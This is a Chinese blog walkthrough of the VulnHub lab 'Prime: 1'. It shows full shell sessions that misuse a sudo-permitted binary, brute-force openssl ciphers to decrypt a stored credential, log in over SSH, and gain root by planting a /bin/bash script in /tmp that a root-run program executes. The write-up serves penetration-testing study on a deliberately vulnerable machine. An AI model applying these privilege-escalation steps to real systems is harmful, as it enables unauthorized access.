Prime2_解法二:openssl解密凭据
<hr><hr>Prime2_解法二:openssl解密凭据<hr><hr>本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表示不支持、不鼓励也不参与任何形式的非法活动。
如有侵权请联系我第一时间删除
靶机下载地址
Prime: 1 ~ VulnHub
find查找备份文件得到key of enc
在第一种解法得到系统立足点后,第一种解法使用linux内核漏洞提权,但内核漏洞提权在实战渗透中太过于暴力,很可能会造成系统服务的重启或中断,导致得到的shell丢失,服务器管理员修复漏洞等不利于渗透的情况。所以这里带来第二种解法:openssl解密凭据
find指令查找带有*back*的文件 并把报错结果丢弃(权限不够)
find / -name "*backup*" 2>/dev/null
查看backup_pass
www-data@ubuntu:/opt/backup/server_database$ cat backup_passcat backup_passyour password for backup_database file enc is "backup_password"Enjoy!运行enc得到密文enc.txt & 密钥key.txt
提示我们enc的密码是backupa_password enc是我们sudo -l查看www-data用户权限时看到的一个文件
www-data@ubuntu:/opt/backup/server_database$ sudo -lsudo -lMatching Defaults entries for www-data on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser www-data may run the following commands on ubuntu: (root) NOPASSWD: /home/saket/enccd到/home/saket目录,再执行enc(直接执行绝对路径会报错)
www-data@ubuntu:/home/saket$ ./enc./encenter password: backup_passwordgood/bin/cp: cannot stat '/root/enc.txt': Permission denied/bin/cp: cannot stat '/root/key.txt': Permission denied没什么反应,看到有个报错权限不够,加个sudo试试
www-data@ubuntu:/home/saket$ sudo ./encsudo ./encenter password: backup_passwordgood还是没反应,重新ls发现多出来enc.txt 和 key.txt原来是运行enc后,帮我们从/root下拿出来了这两个txt文件
www-data@ubuntu:/home/saket$ ls -lahls -lahtotal 44Kdrwxr-xr-x 2 root root 4.0K Dec6 23:23 .drwxr-xr-x 4 root root 4.0K Aug 292019 ..-rw------- 1 root root 20 Aug 312019 .bash_history-rwxr-x--x 1 root root14K Aug 302019 enc-rw-r--r-- 1 root root237 Dec6 23:23 enc.txt-rw-r--r-- 1 root root123 Dec6 23:23 key.txt-rw-r--r-- 1 root root 18 Aug 292019 password.txt-rw-r--r-- 1 root root 33 Aug 312019 user.txt看一下这两个txt
www-data@ubuntu:/home/saket$ cat enc.txtcat enc.txtwww-data@ubuntu:/home/saket$ cat key.txtcat key.txtI know you are the fan of ippsec.So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.第一个是一个加密过的密文,key的大意为我知道你是ippsec的粉丝,所以将ippsec这个字符串转换为md5hash,用它获得你的real form吧
那就先来md5一下ippsec,红笔大佬用kali去进行的,我就直接用赛博大厨了
366a74cb3c959de17d61db30591c39d1用命令行的方法放在下面
-n用于去掉字符串后的换行符
echo –n 'ippsec' | md5sumawk用于处理字符串,awk -F ' ' '{print $1;}'意思是以空格为分割,打印其中第一个部分$1,这样就会只输出366a74cb3c959de17d61db30591c39d1 后面的 - 不会输出。
echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1;}'Openssl解密
简单查看帮助,发现有这么多加密方式,应该使用什么方式去解密呢,我们要知道加密基本分为对称加密和非堆成加密
对称加密使用相同的密钥对密文进行加密和解密,常见的加密方式有AES,DES, 3DES,RC4,5,6等
非对称加密使用一对密钥(公钥和私钥)
┌──(observer㉿kali)-[~]└─$ openssl help:Standard commandsasn1parse ca ciphers cmp cms crl crl2pkcs7 dgst dhparam dsa dsaparam ec ecparam enc engine errstr fipsinstall gendsa genpkey genrsa help info kdf list mac nseq ocsp passwd pkcs12 pkcs7 pkcs8 pkey pkeyparam pkeyutl prime rand rehash req rsa rsautl s_client s_server s_time sess_id smime speed spkac srp storeutl ts verify version x509 Message Digest commands (see the `dgst' command for more details)blake2b512 blake2s256 md4 md5 rmd160 sha1 sha224 sha256 sha3-224 sha3-256 sha3-384 sha3-512 sha384 sha512 sha512-224 sha512-256 shake128 shake256 sm3 Cipher commands (see the `enc' command for more details)aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1 aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8 aria-256-ctr aria-256-ecb aria-256-ofb base64 bf bf-cbc bf-cfb bf-ecb bf-ofb camellia-128-cbccamellia-128-ecbcamellia-192-cbccamellia-192-ecbcamellia-256-cbccamellia-256-ecbcast cast-cbc cast5-cbc cast5-cfb cast5-ecb cast5-ofb des des-cbc des-cfb des-ecb des-ede des-ede-cbc des-ede-cfb des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb des-ede3-ofb des-ofb des3 desx rc2 rc2-40-cbc rc2-64-cbc rc2-cbc rc2-cfb rc2-ecb rc2-ofb rc4 rc4-40 seed seed-cbc seed-cfb seed-ecb seed-ofb sm4-cbc sm4-cfb sm4-ctr sm4-ecb sm4-ofb zlib zstd 虽然知道加密方式为对称加密,但我们还是很难确定具体的加密方式,到底是AES,DES, 3DES,RC4,5,6之中的一种的那种模式,还是是其他的对称加密,所以直接暴力破解吧
用enc模块去解密
需要将key转换成16进制
直接在此前的基础上用od转换成16进制,并用tr进行一些数据上的处理
echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1;}' | tr -d '\n' | od -A n -t x1| tr -d '\n' | tr -d ' '参数说明
od -A n -t x1-A n指定偏移量为null-t x1指定输出类型为单字节的十六进制值 x 表示十六进制,1 表示每个输出项是一个字节。
tr -d '\n' tr -d ' ' -d, 删除 ARRAY1 中的字符
得到hex后的密钥3336366137346362336339353964653137643631646233303539316333396431
以下引用自:Vulnhub靶机实操笔记-Prime1-解法二 - FreeBuf网络安全行业门户
单字节转16进制:使用ASCII码表将每个字符转换为对应的16进制值。例如,字符串 "A" 的16进制表示为 "41",其中 "41" 是字符 "A" 在ASCII码表中的十六进制表示。
双字节转16进制:使用Unicode字符编码标准将每个字符转换为对应的16进制值。例如,字符串 "中" 的16进制表示为 "4E2D",其中 "4E2D" 是字符 "中" 在Unicode编码表中的十六进制表示。
对于判断是使用双字节还是单字节转16进制,您需要查看当前编码方式,主要有以下三种:
ASCII编码:该编码方式只支持单字节字符,因此在此编码方式下,将字符串转换为16进制时只需要使用单字节转换方式即可。例如 "ippsec" 就是单字节。
UTF-8编码:UTF-8编码是一种可变长度字符编码方式,支持单字节和双字节字符。在此编码方式下,单字节字符采用单字节转换方式,而双字节字符采用双字节转换方式。例如 "中文" 就是双字节字符。
UTF-16编码:UTF-16编码是一种双字节编码方式,因此在此编码方式下,所有字符都是双字节字符,需要使用双字节转换方式。例如 "英文" 在UTF-16编码方式下也是双字节字符。
根据上述规则,如果字符串 "ippsec" 是使用ASCII编码的,则将其转换为16进制时只需要使用单字节转换方式;如果是使用UTF-8编码,那么需要对其中的双字节字符使用双字节转换方式。
echo "nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=" | openssl enc -d -a -cipherType -K 3336366137346362336339353964653137643631646233303539316333396431参数说明
-d解密模式
-a base64解密密文一眼顶真为base64加密过的
-cipherType 这里指定加密方式,这里不知道先用这个代替
-K 指定密钥,需要用16进制
加密方式的爆破文件
touch新建一个文件ciphertype.txt vim一下,把加密方式放进去
用awk处理一下,gsub()函数将空格替换成换行符
awk '{gsub(" ","\n");print}' ciphertype.txt处理之后变成这样了(一小部分),那就把换行符都删掉
sm4-ecbsm4-ofb将awk输出的结果处理一下: sort让非空行聚集在一起,然后uniq将每一项字符串但独占一行
awk '{gsub(" ","\n");print}' ciphertype.txt | sort | uniq
然后将结果放进一个指定文件,这样爆破要用到的文件就做好了
awk '{gsub(" ","\n");print}' ciphertype.txt | sort | uniq > ciphertypeforceopenssl+bash脚本暴力破解
写个bash脚本,用for循环暴力破解一下
for cipher in $(cat ciphertypeforce); do echo "nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=" | openssl enc -d -a -$cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $cipher;done
拿到了加密方式和明文
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,aes-256-ecb所以现在用这个也可以了,-aes-256-ecb加密方式是不需要指定iv的(偏移量)
echo "nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=" | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431可能看到这已经忘记之前etc/passwd里有一个1001用户saket,我们拿到了他的凭据,用它去ssh登陆吧
https://img2024.cnblogs.com/blog/3409507/202412/3409507-20241209174406311-1716571134.png
ssh连接saket用户
sudo ssh saket@靶机ip输入yes,输入密码tribute_to_ippsec
成功拿到saket用户的权限,用python提升一下shell交互性,这里前面打sickos解法二时介绍过,不再赘述
python -c 'import pty;pty.spawn("/bin/bash")'sudo -l看一下权限,权限还是不高,但是有新的发现,可以root权限执行/home/victor/undefeated_victor
saket@ubuntu:~$ sudo -lMatching Defaults entries for saket on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser saket may run the following commands on ubuntu: (root) NOPASSWD: /home/victor/undefeated_victor没有权限查看,应该是只有运行权限
saket@ubuntu:~$ cd /home/victorsaket@ubuntu:/home/victor$ ls -liahls: cannot open directory '.': Permission denied给了一段文字 如果你可以打败我那就在你面前挑战我然后报错提示/tmp/challenge: not found
saket@ubuntu:/home/victor$ sudo ./undefeated_victorif you can defeat me then challenge me in front of you/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found执行这个undefeated_victor,就会牵扯到/tmp/challenge,如果undefeated_victor的操作是执行challenge,那就可以在里面写入提权的命令来成功提权(因为root权限执行undefeated_victor)
cd到tmp发现确实是没有challenge,那就直接写一个,刚好tmp目录的权限够用
saket@ubuntu:/tmp$ ls -liahtotal 52K786435 drwxrwxrwt 12 root root 4.0K Dec7 08:26 . 2 drwxr-xr-x 24 root root 4.0K Aug 292019 ..789602 drwxrwxrwt2 root root 4.0K Dec6 22:37 .font-unix788411 drwxrwxrwt2 root root 4.0K Dec6 22:37 .ICE-unix790238 drwx------3 root root 4.0K Dec6 22:37 systemd-private-009a695cfec04602873ff4d0d451c890-colord.service-VimvwZ790192 drwx------3 root root 4.0K Dec6 22:37 systemd-private-009a695cfec04602873ff4d0d451c890-rtkit-daemon.service-7QYuF5789604 drwx------3 root root 4.0K Dec6 22:37 systemd-private-009a695cfec04602873ff4d0d451c890-systemd-timesyncd.service-3nNCGI789603 drwxrwxrwt2 root root 4.0K Dec6 22:37 .Test-unix788409 drwxrwxrwt2 root root 4.0K Dec6 22:37 VMwareDnD789606 drwx------2 root root 4.0K Dec6 22:37 vmware-root789614 -r--r--r--1 root root 11 Dec6 22:37 .X0-lock788410 drwxrwxrwt2 root root 4.0K Dec6 22:37 .X11-unix788412 drwxrwxrwt2 root root 4.0K Dec6 22:37 .XIM-unix成功将challenge写为用于提权的bash脚本文件
saket@ubuntu:/tmp$ echo '#!/bin/bash' > challengesaket@ubuntu:/tmp$ cat challenge#!/bin/bashsaket@ubuntu:/tmp$ echo '/bin/bash' >> challengesaket@ubuntu:/tmp$ cat challenge#!/bin/bash/bin/bash再次执行undefeated_victor 应该就能直接提权了(要回到/home/victor这个目录下)
saket@ubuntu:/home/victor$ sudo undefeated_victor password for saket: sudo: undefeated_victor: command not foundsaket@ubuntu:/home/victor$ sudo /home/victor/undefeated_victorif you can defeat me then challenge me in front of you/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: Permission denied提示没有权限执行,原因是我没有给challenge执行权限
chmod +x /tmp/challenge成功拿下(附定妆照一张)
其实undefeated_victor 就很简单,输入这一句话,然后执行challenge
root@ubuntu:/home/victor# cat undefeated_victor echo"if you can defeat me then challenge me in front of you"; /tmp/challenge
页:
[1]